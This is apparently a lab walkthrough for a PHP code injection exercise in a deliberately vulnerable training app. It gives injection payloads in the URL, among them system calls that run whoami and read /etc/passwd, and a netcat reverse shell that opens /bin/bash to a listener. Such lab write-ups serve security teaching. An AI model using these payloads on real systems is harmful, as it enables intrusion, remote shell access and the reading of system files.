PHP Code Injection Low Security Level
PHP Code Injection
Solution:
Step 1. Click on the message and check the url
Step 2. Find test & replace it with the name of your choice e.g. PseudoTime,and check the results in sourcecode.
Test with phpinfo()and check the results. (You can explore the same with different values)
Step 3. Note: All php statements terminates with ;
Lets test the lesson with php system call
Visit - https://www.php.net/manual/en/functio... (For more details and syntax)
Lets test with below values:
system("whoami");
system("pwd");
system("cat /etc/passwd");
Step 4. Lets exploit by using a reverse shell. Open the terminal
Use commands -)
ifconfig *check your ip address (Your IP address will be different)
nc -lvp 4444
Go to the main lesson page and type below details in the url
;system("nc -vn 10.0.2.15 4444 -e /bin/bash");
Use commands of your choice. e.g.
pwd
uname -a
ls (Explore the lesson with more commands)
PseudoTime
